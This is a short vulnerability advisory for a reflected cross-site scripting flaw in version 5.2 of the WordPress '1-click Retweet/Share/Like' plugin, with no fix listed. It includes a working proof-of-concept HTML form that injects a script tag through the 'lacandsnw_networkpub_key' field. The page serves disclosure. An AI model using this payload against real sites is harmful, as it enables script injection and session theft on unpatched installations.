Home / os / winmobile

WordPress 1-Click Retweet/Share/Like 5.2 Cross Site Scripting

Posted on 03 August 2015

Title: WordPress '1-click Retweet/Share/Like' Plugin Version: 5.2 Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej Date: 2015-06-21 Download: - https://wordpress.org/plugins/1-click-retweetsharelike/ - https://plugins.svn.wordpress.org/1-click-retweetsharelike/ Notified Vendor/WordPress: 2015-06-21 ========================================================== ## Plugin description ========================================================== Adds Facebook Like, Facebook Share, Twitter, Google +1, LinkedIn Share, Facebook Recommendations. Automatic publishing of content to 20+ Social Networ ## Vulnerabilities ========================================================== The plugin is vulnerable to reflected XSS. PoC: Submit the following request (no need to login first..) <form method="POST" action="[URL]/wp-login.php"> <input type="text" name="lacandsnw_networkpub_key" value=""><script>alert(1)</script>"><br /> <input type="submit"> </form> ## Solution ========================================================== No fix available ========================================================== Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

 

TOP